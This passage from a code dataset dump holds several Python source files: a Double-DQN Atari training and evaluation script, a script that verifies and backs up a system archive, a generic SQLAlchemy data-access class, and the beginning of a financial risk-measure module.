empty!\")\n if index < self.agent_history_length - 1:\n raise ValueError(f'Index must be min {self.agent_history_length-1}')\n return self.frames[index-self.agent_history_length+1:index+1, ...]\n \n def _get_valid_indices(self):\n for i in range(self.batch_size):\n while True:\n index = random.randint(self.agent_history_length, self.count - 1)\n if index < self.agent_history_length:\n continue\n if index >= self.current and index - self.agent_history_length <= self.current:\n continue\n if self.terminal_flags[index - self.agent_history_length:index].any():\n continue\n break\n self.indices[i] = index\n \n def get_minibatch(self):\n \"\"\"\n Returns a minibatch of self.batch_size = 32 transitions\n \"\"\"\n if self.count < self.agent_history_length:\n raise ValueError('Not enough memories to get a minibatch')\n \n self._get_valid_indices()\n \n for i, idx in enumerate(self.indices):\n self.states[i] = self._get_state(idx - 1)\n self.new_states[i] = self._get_state(idx)\n \n return np.transpose(self.states, axes=(0, 2, 3, 1)), self.actions[self.indices], self.rewards[self.indices], np.transpose(self.new_states, axes=(0, 2, 3, 1)), self.terminal_flags[self.indices]\n \n def load_replay(self, path):\n \"\"\"\n Loads the Replay Memory State Variables from path\n \"\"\"\n try:\n with open(os.path.join(path, 'replay_count.p'), 'rb') as f:\n self.count = pickle.load(file=f)\n with open(os.path.join(path, 'replay_current.p'), 'rb') as f:\n self.current = pickle.load(file=f)\n self.actions = np.load(os.path.join(path, 'replay_actions.npy'))\n self.rewards = np.load(os.path.join(path, 'replay_rewards.npy'))\n self.frames = np.load(os.path.join(path, 'replay_frames.npy'))\n self.terminal_flags = np.load(os.path.join(path, 'replay_terminal_flags.npy'))\n except:\n raise FileNotFoundError(\"Files for Replay Memory State do not exist\")\n\n def save_replay(self, path):\n \"\"\"\n Saves the Replay Memory State Variables to path \n \"\"\"\n with open(os.path.join(path, 'replay_count.p'), 'wb') as f:\n pickle.dump(self.count, file=f)\n with open(os.path.join(path, 'replay_current.p'), 'wb') as f:\n pickle.dump(self.current, file=f)\n np.save(os.path.join(path, 'replay_actions.npy'), self.actions)\n np.save(os.path.join(path, 'replay_rewards.npy'), self.rewards)\n np.save(os.path.join(path, 'replay_frames.npy'), self.frames)\n np.save(os.path.join(path, 'replay_terminal_flags.npy'), self.terminal_flags)\n\ndef learn(session, replay_memory, main_dqn, target_dqn, batch_size, gamma):\n \"\"\"\n Args:\n session: A tensorflow sesson object\n replay_memory: A ReplayMemory object\n main_dqn: A DQN object\n target_dqn: A DQN object\n batch_size: Integer, Batch size\n gamma: Float, discount factor for the Bellman equation\n Returns:\n loss: The loss of the minibatch, for tensorboard\n Draws a minibatch from the replay memory, calculates the \n target Q-value that the prediction Q-value is regressed to. \n Then a parameter update is performed on the main DQN.\n \"\"\"\n # Draw a minibatch from the replay memory\n states, actions, rewards, new_states, terminal_flags = replay_memory.get_minibatch() \n # The main network estimates which action is best (in the next \n # state s', new_states is passed!) \n # for every transition in the minibatch\n arg_q_max = session.run(main_dqn.best_action, feed_dict={main_dqn.input:new_states})\n # The target network estimates the Q-values (in the next state s', new_states is passed!) \n # for every transition in the minibatch\n q_vals = session.run(target_dqn.q_values, feed_dict={target_dqn.input:new_states})\n double_q = q_vals[range(batch_size), arg_q_max]\n # Bellman equation. Multiplication with (1-terminal_flags) makes sure that \n # if the game is over, targetQ=rewards\n target_q = rewards + (gamma*double_q * (1-terminal_flags))\n # Gradient descend step to update the parameters of the main network\n loss, _ = session.run([main_dqn.loss, main_dqn.update], \n feed_dict={main_dqn.input:states, \n main_dqn.target_q:target_q, \n main_dqn.action:actions})\n return loss\n\nclass TargetNetworkUpdater:\n \"\"\"Copies the parameters of the main DQN to the target DQN\"\"\"\n def __init__(self, main_dqn_vars, target_dqn_vars):\n \"\"\"\n Args:\n main_dqn_vars: A list of tensorflow variables belonging to the main DQN network\n target_dqn_vars: A list of tensorflow variables belonging to the target DQN network\n \"\"\"\n self.main_dqn_vars = main_dqn_vars\n self.target_dqn_vars = target_dqn_vars\n\n def _update_target_vars(self):\n update_ops = []\n for i, var in enumerate(self.main_dqn_vars):\n copy_op = self.target_dqn_vars[i].assign(var.value())\n update_ops.append(copy_op)\n return update_ops\n \n def __call__(self, sess):\n \"\"\"\n Args:\n sess: A Tensorflow session object\n Assigns the values of the parameters of the main network to the \n parameters of the target network\n \"\"\"\n update_ops = self._update_target_vars()\n for copy_op in update_ops:\n sess.run(copy_op)\n\ndef generate_gif(frame_number, frames_for_gif, reward, path, prefix=\"TRAIN\"):\n \"\"\"\n Args:\n frame_number: Integer, determining the number of the current frame\n frames_for_gif: A sequence of (210, 160, 3) frames of an Atari game in RGB\n reward: Integer, Total reward of the episode that es ouputted as a gif\n path: String, path where gif is saved\n \"\"\"\n for idx, frame_idx in enumerate(frames_for_gif): \n frames_for_gif[idx] = resize(frame_idx, (420, 320, 3), \n preserve_range=True, order=0).astype(np.uint8)\n \n imageio.mimsave(os.path.join(path, f'{prefix}_frame_{frame_number}_reward_{reward}.gif'), \n frames_for_gif, duration=1/30)\n\nclass Atari:\n \"\"\"Wrapper for the environment provided by gym\"\"\"\n def __init__(self, envName, no_op_steps, agent_history_length, frameskip):\n self.env = gym.make(envName, frameskip=frameskip)\n self.env.seed(0)\n self.env.action_space.seed(0)\n self.process_frame = FrameProcessor()\n self.state = None\n self.last_lives = 0\n self.no_op_steps = no_op_steps\n self.agent_history_length = agent_history_length\n self.frameskip = frameskip\n\n def reset(self, sess, evaluation=False):\n \"\"\"\n Args:\n sess: A Tensorflow session object\n evaluation: A boolean saying whether the agent is evaluating or training\n Resets the environment and stacks four frames ontop of each other to \n create the first state\n \"\"\"\n frame = self.env.reset()\n self.last_lives = 0\n terminal_life_lost = True # Set to true so that the agent starts \n # with a 'FIRE' action when evaluating\n if evaluation:\n for _ in range(random.randint(1, self.no_op_steps)):\n frame, _, _, _ = self.env.step(1) # Action 'Fire'\n processed_frame = self.process_frame(sess, frame) # (★★★)\n self.state = np.repeat(processed_frame, self.agent_history_length, axis=2)\n \n return terminal_life_lost\n\n def step(self, sess, action):\n \"\"\"\n Args:\n sess: A Tensorflow session object\n action: Integer, action the agent performs\n Performs an action and observes the reward and terminal state from the environment\n \"\"\"\n new_frame, reward, terminal, info = self.env.step(action) # (5★)\n \n if info['ale.lives'] < self.last_lives:\n terminal_life_lost = True\n else:\n terminal_life_lost = terminal\n self.last_lives = info['ale.lives']\n \n processed_new_frame = self.process_frame(sess, new_frame) # (6★)\n new_state = np.append(self.state[:, :, 1:], processed_new_frame, axis=2) # (6★) \n self.state = new_state\n \n return processed_new_frame, reward, terminal, terminal_life_lost, new_frame\n\ndef clip_reward(reward):\n return np.sign(reward) \n\ndef set_seed(random_seed):\n tf.set_random_seed(random_seed)\n random.seed(random_seed)\n np.random.seed(random_seed)\n\ndef train():\n \"\"\"Contains the training and evaluation loops\"\"\"\n SEED_PATH = os.path.join(PATH, 'seed_offset.txt')\n if os.path.exists(SEED_PATH):\n seed_arr = np.loadtxt(SEED_PATH)\n if seed_arr != SEED_OFFSET:\n raise ValueError(f'Training with an incorrect offset:{SEED_OFFSET} Correct Offset:{seed_arr}')\n else:\n with open(SEED_PATH, 'a') as f:\n print(SEED_OFFSET, file=f)\n\n if SAVE:\n print(f'***Save option turned on: Filed would be saved in {PATH}***')\n print(\"***If you don't see the message 'All files saved' run cleaner.py***\")\n my_replay_memory = ReplayMemory(size=MEMORY_SIZE, batch_size=BS, \\\n agent_history_length=AGENT_HISTORY_LENGTH)\n if LOAD:\n my_replay_memory.load_replay(PATH)\n print(\"Replay Memory Loaded\")\n update_networks = TargetNetworkUpdater(MAIN_DQN_VARS, TARGET_DQN_VARS)\n explore_exploit_sched = ExplorationExploitationScheduler(\n MAIN_DQN, atari.env.action_space.n, \n replay_memory_start_size=REPLAY_MEMORY_START_SIZE, \n max_steps=MAX_STEPS)\n\n reward_per_01 = os.path.join(PATH, 'rewards_every_episode.dat')\n reward_per_10 = os.path.join(PATH, 'rewards_every_10_episodes.dat')\n reward_eval_01= os.path.join(PATH, 'rewards_eval_every_episodes.dat')\n reward_eval = os.path.join(PATH, 'rewards_eval.dat')\n\n # with tf.Session(config=config) as sess:\n with tf.Session() as sess:\n\n time_step = 0\n episode_number = 0\n frame_number = 0\n rewards = []\n\n if LOAD:\n ### Load the values\n checkpoint_file = tf.train.latest_checkpoint(PATH)\n loader = tf.train.import_meta_graph(checkpoint_file + '.meta')\n loader.restore(sess, checkpoint_file)\n with open(os.path.join(PATH, 'train_time_step.p'), 'rb') as f:\n time_step = pickle.load(file=f)\n with open(os.path.join(PATH, 'train_episode_number.p'), 'rb') as f:\n episode_number = pickle.load(file=f)\n with open(os.path.join(PATH, 'train_frame_number.p'), 'rb') as f:\n frame_number = pickle.load(file=f)\n with open(os.path.join(PATH, 'train_rewards.p'), 'rb') as f:\n rewards = pickle.load(file=f)\n else:\n sess.run(init)\n \n if time_step >= TRAIN_STEPS:\n raise ValueError(\"Agent already trained upto this time_step\")\n\n while time_step < TRAIN_STEPS:\n \n ########################\n ####### Training #######\n ########################\n\n epoch_steps = 0\n while epoch_steps < EVAL_FREQUENCY:\n set_seed(episode_number + SEED_OFFSET)\n terminal_life_lost = atari.reset(sess)\n episode_reward_sum = 0\n episode_iter = 0\n while episode_iter < MAX_EPISODE_LENGTH:\n episode_iter += FRAME_SKIP # (4★)\n action = explore_exploit_sched.get_action(sess, time_step, atari.state) # (5★)\n processed_new_frame, reward, terminal, terminal_life_lost, _ = atari.step(sess, action) \n time_step += FRAME_SKIP\n frame_number += 1\n epoch_steps += FRAME_SKIP\n episode_reward_sum += reward\n \n # Clip the reward\n clipped_reward = clip_reward(reward)\n \n # (7★) Store transition in the replay memory\n my_replay_memory.add_experience(action=action, \n frame=processed_new_frame[:, :, 0],\n reward=clipped_reward, \n terminal=terminal_life_lost) \n \n ## Perform Gradient Descent\n if time_step % UPDATE_FREQ == 0 and time_step > REPLAY_MEMORY_START_SIZE:\n loss = learn(sess, my_replay_memory, MAIN_DQN, TARGET_DQN,\n BS, gamma=DISCOUNT_FACTOR) # (8★)\n\n ## Update the Target Network\n if time_step % NETW_UPDATE_FREQ == 0 and time_step > REPLAY_MEMORY_START_SIZE:\n update_networks(sess) # (9★)\n \n ## Save the network parameters\n if SAVE and time_step % SAVE_FREQUENCY == 0:\n saver.save(sess, os.path.join(PATH, 'my_model'), global_step=time_step)\n if terminal:\n terminal = False\n break\n\n episode_number += 1\n rewards.append(episode_reward_sum)\n \n if SAVE:\n with open(reward_per_01, 'a') as f:\n print(time_step, frame_number, episode_number, episode_reward_sum, file = f)\n \n # Output the progress:\n if len(rewards) % 10 == 0:\n print(len(rewards), time_step, np.mean(rewards[-100:]))\n if SAVE:\n with open(reward_per_10, 'a') as f:\n print(time_step, frame_number, episode_number,\n np.mean(rewards[-10:]), file=f)\n \n ########################\n ###### Evaluation ######\n ########################\n terminal = True\n gif = True\n frames_for_gif = []\n eval_rewards = []\n evaluate_frame_number = 0\n \n for _ in range(EVAL_STEPS):\n if terminal:\n terminal_life_lost = atari.reset(sess, evaluation=True)\n episode_reward_sum = 0\n terminal = False\n \n # Fire (action 1), when a life was lost or the game just started, \n # so that the agent does not stand around doing nothing. When playing \n # with other environments, you might want to change this...\n action = 1 if terminal_life_lost else explore_exploit_sched.get_action(sess, time_step,\n atari.state, \n evaluation=True)\n \n processed_new_frame, reward, terminal, terminal_life_lost, new_frame = atari.step(sess, action) ### A seperate Atari\n evaluate_frame_number += 1\n episode_reward_sum += reward\n\n if gif: \n frames_for_gif.append(new_frame)\n\n if terminal:\n if SAVE:\n with open(reward_eval_01, 'a') as f:\n print(time_step, frame_number, episode_number, episode_reward_sum, file = f)\n gif = False # Save only the first game of the evaluation as a gif\n break\n \n ## Append the rewards\n eval_rewards.append(episode_reward_sum)\n print(\"Evaluation score:\\n\", np.mean(eval_rewards)) \n\n if SAVE:\n try:\n generate_gif(frame_number, frames_for_gif, eval_rewards[0], PATH)\n except IndexError:\n print(\"No evaluation game finished\")\n \n frames_for_gif = []\n\n if SAVE:\n with open(reward_eval, 'a') as f:\n print(time_step, frame_number, episode_number, np.mean(eval_rewards), file=f)\n\n print(f'Training Done till {time_step}')\n if SAVE:\n print(\"***Saving training parameters: In case you don't see Saved! run the training procedure from start***\")\n saver.save(sess, os.path.join(PATH, 'my_model'), global_step=time_step)\n with open(os.path.join(PATH, 'train_time_step.p'), 'wb') as f:\n pickle.dump(time_step, file=f)\n with open(os.path.join(PATH, 'train_episode_number.p'), 'wb') as f:\n pickle.dump(episode_number, file=f)\n with open(os.path.join(PATH, 'train_frame_number.p'), 'wb') as f:\n pickle.dump(frame_number, file=f)\n with open(os.path.join(PATH, 'train_rewards.p'), 'wb') as f:\n pickle.dump(rewards, file=f)\n if SAVE:\n my_replay_memory.save_replay(PATH)\n print(\"***!Saved***\")\n print(\"All files saved\")\n\ndef eval_model(frameskip, gif_path, time_step, meta_graph_path, checkpoint_path):\n '''\n frameskip: frameskip parameter\n meta_graph_path: path to meta-file (e.g.: '/home/DQN/Enduro-20/run_1/my_model-30000000.meta')\n checkpoint_path: path to checkpoint-file (e.g.: '/home/DQN/Enduro-20/run_1/my_model-30000000') \n '''\n os.makedirs(gif_path, exist_ok=True)\n\n explore_exploit_sched = ExplorationExploitationScheduler(\n MAIN_DQN, atari.env.action_space.n, \n replay_memory_start_size=REPLAY_MEMORY_START_SIZE, \n max_steps=MAX_STEPS)\n\n # with tf.Session(config=config) as sess: \n with tf.Session() as sess:\n\n ### Restore Model\n saver = tf.train.import_meta_graph(meta_graph_path)\n saver.restore(sess, checkpoint_path)\n\n frames_for_gif = []\n terminal_life_lost = atari.reset(sess, evaluation = True)\n episode_reward_sum = 0\n while len(frames_for_gif) < EVAL_STEPS:\n # atari.env.render()\n action = 1 if terminal_life_lost else explore_exploit_sched.get_action(sess, 0, atari.state, \n evaluation = True)\n \n processed_new_frame, reward, terminal, terminal_life_lost, new_frame = atari.step(sess, action)\n episode_reward_sum += reward\n frames_for_gif.append(new_frame)\n if terminal == True:\n break\n \n # atari.env.close()\n print(f'The total reward for timestep {time_step} is {episode_reward_sum}')\n\n if SAVE:\n print(\"Creating gif...\")\n generate_gif(time_step, frames_for_gif, episode_reward_sum, gif_path, prefix=\"EVAL\")\n print(f'Gif created, check the folder {gif_path}/{GAME}_{FRAME_SKIP}_{time_step}')\n return episode_reward_sum\n\nif __name__ == '__main__':\n # Setup Parser\n parser = argparse.ArgumentParser(formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--game\", default=\"Pong\", help=\"Name of Atari Game\")\n parser.add_argument(\"--version\", default=4, type=int, help=\"Version\")\n parser.add_argument(\"--frameskip\", default=1, type=int, help=\"frameskip value\")\n\n parser.add_argument(\"--train\", action='store_true', help='Train vs Evaluate')\n parser.add_argument(\"--save\", action='store_true', help='Save Models and Results')\n parser.add_argument(\"--save_frequency\", type=int, default=100000, help=\"Save Frequency\")\n parser.add_argument(\"--load\", action='store_true', help=\"Load Model in last RUN in PATH\")\n\n parser.add_argument(\"--eval_steps\", type = int, help=\"Number of evaluation steps\")\n parser.add_argument(\"--netw_update_freq\", type = int, help=\"Frequency of updation of main network\")\n parser.add_argument(\"--update_freq\", type = int, help=\"Number of actions before gradient descent\")\n parser.add_argument(\"--memory_size\", type = int, default=1000000, help=\"Size of replay memory: Default 1 million\")\n parser.add_argument(\"--max_steps\", type = int, default=100000000, help=\"Total number of frames an agent sees\")\n parser.add_argument(\"--train_steps\", type = int, default = 50000000, help=\"Trained upto TRAIN_STEPS\")\n parser.add_argument(\"--gamma\", type = float, default = 0.99, help = \"Discount Factor\")\n parser.add_argument(\"--offset\", type=int, default = 0, help=\"Offset of seed to train the model on\")\n parser.add_argument(\"--time_step\", type = int, help=\"TIME_STEP corresponding to evaluation of model\")\n parser.add_argument(\"--run_id\", type=int, help=\"RUN to be trained\")\n parser.add_argument(\"--path\", help=\"Path to store models and values: PATH/'GAME'-'FRAMESKIP'/GAMMA-'GAMMA'/run_'RUN_ID'/\")\n parser.add_argument(\"--seed\", type=int, default=0, help=\"Random seed to evaluate model on\")\n \n args = parser.parse_args()\n tf.reset_default_graph()\n RANDOM_SEED = args.seed\n\n GAME = args.game\n ENV_NAME = f'{args.game}Deterministic-v{args.version}'\n FRAME_SKIP = args.frameskip\n \n TRAIN = args.train\n SAVE = args.save\n SAVE_FREQUENCY = args.save_frequency\n LOAD = args.load\n atari = Atari(ENV_NAME, no_op_steps=NO_OP_STEPS, agent_history_length=AGENT_HISTORY_LENGTH, \\\n frameskip=FRAME_SKIP)\n \n # main DQN and target DQN networks:\n with tf.variable_scope('mainDQN'):\n MAIN_DQN = DQN(atari.env.action_space.n, HIDDEN, LEARNING_RATE, agent_history_length=AGENT_HISTORY_LENGTH)\n with tf.variable_scope('targetDQN'):\n TARGET_DQN = DQN(atari.env.action_space.n, HIDDEN, TARGET_LEARNING_RATE, agent_history_length=AGENT_HISTORY_LENGTH)\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver(max_to_keep=100000) \n\n MAIN_DQN_VARS = tf.trainable_variables(scope='mainDQN')\n TARGET_DQN_VARS = tf.trainable_variables(scope='targetDQN')\n\n # update frequencies of the target and main networks\n if args.netw_update_freq:\n NETW_UPDATE_FREQ = args.netw_update_freq\n elif FRAME_SKIP<=4:\n NETW_UPDATE_FREQ = 10000*FRAME_SKIP\n else:\n NETW_UPDATE_FREQ = 5000*FRAME_SKIP\n \n if args.update_freq:\n UPDATE_FREQ = args.update_freq\n else:\n UPDATE_FREQ = max(FRAME_SKIP, 16)\n \n if args.eval_steps:\n EVAL_STEPS = args.eval_steps\n else:\n EVAL_STEPS = int(MAX_EPISODE_LENGTH/FRAME_SKIP)\n\n MEMORY_SIZE = args.memory_size\n MAX_STEPS = args.max_steps\n TRAIN_STEPS = args.train_steps\n DISCOUNT_FACTOR = args.gamma\n SEED_OFFSET = args.offset\n\n if TRAIN:\n print(\"***TRAINING***\")\n ### Need to save and load the model\n if args.path:\n PATH = os.path.join(args.path, f'{GAME}-{FRAME_SKIP}/GAMMA-{DISCOUNT_FACTOR}')\n else:\n PATH = f'/content/drive/MyDrive/DQN-Train/{GAME}-{FRAME_SKIP}/GAMMA-{DISCOUNT_FACTOR}' \n ### Fetch RUNID\n if args.run_id:\n RUNID = args.run_id\n else:\n RUNID = 1\n while os.path.exists(os.path.join(PATH, 'run_' + str(RUNID))):\n RUNID += 1\n \n if LOAD:\n RUNID -= 1\n\n PATH = os.path.join(PATH, 'run_' + str(RUNID))\n if TRAIN or LOAD:\n os.makedirs(PATH, exist_ok=True)\n\n print(f'The env {ENV_NAME} has the following {atari.env.action_space.n} \\\n actions: {atari.env.unwrapped.get_action_meanings()}')\n train()\n \n elif args.time_step:\n print(f'Proceeding with Evaluation of Model with time step {args.time_step}')\n META_PATH = os.path.join(args.path, f'my_model-{args.time_step}.meta')\n CHECKPOINT = os.path.join(args.path, f'my_model-{args.time_step}')\n eval_model(FRAME_SKIP, args.path, args.time_step, META_PATH, CHECKPOINT)\n\n else:\n raise ValueError(\"Folder Evaluation Not Yet Implemented\")","sub_path":"dqn-trainer-colab.py","file_name":"dqn-trainer-colab.py","file_ext":"py","file_size_in_byte":39608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637720891","text":"import os\nfrom pathlib import Path\nfrom configparser import ConfigParser\nfrom common.config import add_config_section\nfrom common.file import md5sum, copy_file_progress\nfrom process_data_defs import (\n mount_wim,\n process,\n)\n\n\"\"\" SYSTEM \"\"\"\nSYSTEM_DIR = '/home/bba/bin/PWCode/projects/test' # Dir with wim- or tar archive and pwcode.ini\n\n\ndef main():\n config_dir = os.environ[\"pwcode_config_dir\"] # Get PWCode config path\n tmp_dir = config_dir + '/tmp'\n os.chdir(tmp_dir) # Avoid littering from subprocesses\n config = ConfigParser()\n config_file = SYSTEM_DIR + \"/pwcode.ini\"\n\n if os.path.isdir(SYSTEM_DIR) and os.path.isfile(config_file):\n config.read(config_file)\n checksum = config.get('SYSTEM', 'checksum')\n checksum_verified = config.get('SYSTEM', 'checksum_verified')\n archive_format = config.get('SYSTEM', 'archive_format')\n\n system_name = os.path.basename(SYSTEM_DIR)\n archive_path = SYSTEM_DIR + '/' + system_name + '.' + archive_format\n archive_bak_path = SYSTEM_DIR + '/bak/' + system_name + '.' + archive_format\n mount_dir = SYSTEM_DIR + '/mount'\n bak_dir = SYSTEM_DIR + '/bak'\n\n for dir in [mount_dir, bak_dir]:\n Path(dir).mkdir(parents=True, exist_ok=True)\n\n if not checksum:\n return \"No checksum in 'pwcode.ini'. Exiting.\"\n\n if not os.path.isfile(archive_path):\n return \"'\" + archive_path + \"' is not a valid archive path. Exiting.\"\n\n if not eval(checksum_verified):\n if checksum == md5sum(archive_path):\n print(\"Data verified by checksum.\")\n config.set('SYSTEM', 'checksum_verified', \"True\")\n\n with open(config_file, \"w+\") as f:\n config.write(f, space_around_delimiters=False)\n else:\n return \"Checksum Mismatch. Check data integrity. Exiting.\"\n\n if not os.path.isfile(archive_bak_path):\n print(\"\\nBackup archive before processing...\")\n copy_file_progress(archive_path, archive_bak_path, prefix='Backup archive:', suffix='done', decimals=0, length=50)\n print(\"\\nBackup complete.\")\n\n process(mount_dir, archive_format, archive_path)\n\n else:\n return \"'\" + SYSTEM_DIR + \"' is not a valid path. Exiting.\"\n\n # return 'All data processed.' # WAIT: Printes ikke alltid -> hvorfor?\n\n\nif __name__ == '__main__':\n msg = main()\n print(msg)\n\n","sub_path":"config/sidepanel/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"503656672","text":"from sqlalchemy.exc import SQLAlchemyError\nfrom commons.get_connexion import DataProvider as dataProvider\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import *\n\n\nclass GenericDao(object):\n def __init__(self, table_name, entity_type):\n self.table_name = table_name\n self.entity_type = entity_type\n self.dataProvider = dataProvider()\n self.table = Table(table_name, self.dataProvider.metadata, autoload=True)\n self.table_mapper = mapper(entity_type, self.table)\n\n def get_connexion(self):\n return self.dataProvider.session\n\n def close_connexion(self, session):\n if session is not None:\n try:\n session.close()\n except SQLAlchemyError as e:\n raise (e)\n\n def do_select_all(self):\n try:\n session = self.get_connexion()\n except SQLAlchemyError as e:\n raise (e)\n return session.query(self.entity_type).all()\n\n def do_select(self, query):\n try:\n session = self.get_connexion()\n entity = session.query(self.entity_type).filter(query).first()\n except SQLAlchemyError as e:\n raise (e)\n return entity\n\n def do_insert(self, entity):\n session = None\n try:\n session = self.get_connexion()\n session.add(entity)\n session.commit()\n return entity\n except SQLAlchemyError as e:\n session.rollback()\n raise (e)\n\n def do_update(self, entity, query):\n try:\n session = self.get_connexion()\n result = session.query(self.entity_type).filter(query).update(entity.to_dict())\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise (e)\n return result\n\n def do_exist(self, query):\n try:\n session = self.get_connexion()\n result = session.query(self.entity_type).filter(query).exists()\n except SQLAlchemyError as e:\n raise (e)\n return result\n\n def do_count_all(self):\n try:\n session = self.get_connexion()\n result = session.query(self.entity_type).count()\n except SQLAlchemyError as e:\n session.rollback()\n raise (e)\n return result\n\n def do_delete(self, query):\n try:\n session = self.get_connexion()\n result = session.query(self.entity_type).filter(query).delete()\n session.commit()\n except SQLAlchemyError as e:\n raise (e)\n return result","sub_path":"commons/generic_dao.py","file_name":"generic_dao.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"468993750","text":"\"\"\"\nCopyright 2019 Goldman Sachs.\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. See the License for the\nspecific language governing permissions and limitations\nunder the License.\n\"\"\"\nimport copy\nfrom typing import Optional, Union\n\nimport pandas as pd\nfrom gs_quant.base import Market, EnumBase\nfrom gs_quant.common import AssetClass, CurrencyParameter, FiniteDifferenceParameter, AggregationLevel\nfrom gs_quant.context_base import do_not_serialise\nfrom gs_quant.target.risk import RiskMeasure as __RiskMeasure, RiskMeasureType, RiskMeasureUnit\n\nDEPRECATED_MEASURES = {'IRDeltaParallelLocalCcy': 'IRDelta',\n 'InflationDeltaParallelLocalCcy': 'InflationDelta',\n 'IRXccyDeltaParallelLocalCurrency': 'IRXccyDelta',\n 'IRVegaParallelLocalCcy': 'IRVega',\n }\n\n\nclass RiskMeasure(__RiskMeasure):\n\n def __lt__(self, other):\n return self.name < other.name\n\n def __repr__(self):\n return self.name or self.measure_type.name\n\n @property\n @do_not_serialise\n def pricing_context(self):\n from gs_quant.markets import PricingContext\n return PricingContext.current\n\n\nclass __RelativeRiskMeasure(RiskMeasure):\n\n def __init__(self,\n to_market: Market,\n asset_class: Union[AssetClass, str] = None,\n measure_type: Union[RiskMeasureType, str] = None,\n unit: Union[RiskMeasureUnit, str] = None,\n value: Union[float, str] = None,\n name: str = None):\n super().__init__(asset_class=asset_class, measure_type=measure_type, unit=unit, value=value, name=name)\n self.__to_market = to_market\n\n @property\n @do_not_serialise\n def pricing_context(self):\n from gs_quant.markets import PricingContext, RelativeMarket\n current = PricingContext.current\n return current.clone(market=RelativeMarket(from_market=current.market, to_market=self.__to_market))\n\n\nclass PnlExplain(__RelativeRiskMeasure):\n \"\"\" Pnl Explained \"\"\"\n\n def __init__(self, to_market: Market):\n super().__init__(to_market, measure_type=RiskMeasureType.PnlExplain, name=RiskMeasureType.PnlExplain.value)\n\n\nclass PnlExplainClose(PnlExplain):\n\n def __init__(self):\n from gs_quant.markets import CloseMarket\n super().__init__(CloseMarket())\n\n\nclass PnlExplainLive(PnlExplain):\n\n def __init__(self):\n from gs_quant.markets import LiveMarket\n super().__init__(LiveMarket())\n\n\nclass PnlPredictLive(__RelativeRiskMeasure):\n \"\"\" Pnl Predicted \"\"\"\n\n def __init__(self):\n from gs_quant.markets import LiveMarket\n super().__init__(LiveMarket(), measure_type=RiskMeasureType.PnlPredict, name=RiskMeasureType.PnlPredict.value)\n\n\ndef __risk_measure_with_doc_string(name: str,\n doc: str,\n measure_type: RiskMeasureType,\n asset_class: Optional[AssetClass] = None,\n unit: Optional[RiskMeasureUnit] = None,\n parameter_type: str = None\n ) -> RiskMeasure:\n if parameter_type == \"Currency\":\n measure = RiskMeasureWithCurrencyParameter(measure_type=measure_type, asset_class=asset_class, unit=unit,\n name=name)\n elif parameter_type == \"FiniteDifference\":\n measure = RiskMeasureWithFiniteDifferenceParameter(measure_type=measure_type, asset_class=asset_class,\n unit=unit, name=name)\n else:\n measure = RiskMeasure(measure_type=measure_type, asset_class=asset_class, unit=unit, name=name)\n measure.__doc__ = doc\n return measure\n\n\nclass ParameterisedRiskMeasure(RiskMeasure):\n def __init__(self, name: str = None, asset_class: Union[AssetClass, str] = None,\n measure_type: Union[RiskMeasureType, str] = None, unit: Union[RiskMeasureUnit, str] = None,\n value: Union[float, str] = None, parameter_type: str = None):\n super().__init__(asset_class=asset_class, measure_type=measure_type, unit=unit, value=value, name=name)\n self.parameter_type = parameter_type\n\n def __repr__(self):\n name = self.name or self.measure_type.name\n params = None\n if self.parameters:\n params = self.parameters.as_dict()\n params.pop('parameter_type', None)\n sorted_keys = sorted(params.keys(), key=lambda x: x.lower())\n params = ', '.join(\n [f'{k}:{params[k].value if isinstance(params[k], EnumBase) else params[k]}' for k in sorted_keys])\n return name + '(' + params + ')' if params else name\n\n def parameter_is_empty(self):\n return self.parameters is None\n\n\nclass RiskMeasureWithCurrencyParameter(ParameterisedRiskMeasure):\n def __call__(self, currency: str = None):\n # hack to prevent ParameterisedRiskMeasure input into pandas LocIndexer as a callable function that returns\n # output for indexing (https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.loc.html)\n if isinstance(currency, pd.DataFrame):\n return self\n\n clone = copy.copy(self)\n parameter = CurrencyParameter(value=currency)\n clone.parameters = parameter\n return clone\n\n\nclass RiskMeasureWithFiniteDifferenceParameter(ParameterisedRiskMeasure):\n def __call__(self, currency: str = None,\n aggregation_level: Union[AggregationLevel, str] = None, local_curve: bool = None,\n finite_difference_method: Union[FiniteDifferenceParameter, str] = None,\n mkt_marking_mode: str = None, bump_size: float = None, scale_factor: float = None, name: str = None):\n # hack to prevent ParameterisedRiskMeasure input into pandas LocIndexer as a callable function that returns\n # output for indexing (https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.loc.html)\n if isinstance(currency, pd.DataFrame):\n return self\n\n clone = copy.copy(self)\n if name:\n clone.name = name\n parameter = FiniteDifferenceParameter(aggregation_level=aggregation_level, currency=currency,\n local_curve=local_curve, bump_size=bump_size,\n finite_difference_method=finite_difference_method,\n scale_factor=scale_factor, mkt_marking_mode=mkt_marking_mode)\n clone.parameters = parameter\n return clone\n\n\nDollarPrice = __risk_measure_with_doc_string('DollarPrice', 'Present value in USD', RiskMeasureType.Dollar_Price)\nPrice = __risk_measure_with_doc_string('Price', 'Present value in local currency', RiskMeasureType.PV,\n parameter_type=\"Currency\")\n\nForwardPrice = __risk_measure_with_doc_string(\n 'ForwardPrice',\n 'Forward price',\n RiskMeasureType.Forward_Price,\n unit=RiskMeasureUnit.BPS)\nBaseCPI = __risk_measure_with_doc_string('BaseCPI', 'Base CPI level', RiskMeasureType.BaseCPI)\nTheta = __risk_measure_with_doc_string('Theta', '1 day Theta', RiskMeasureType.Theta)\nEqDelta = 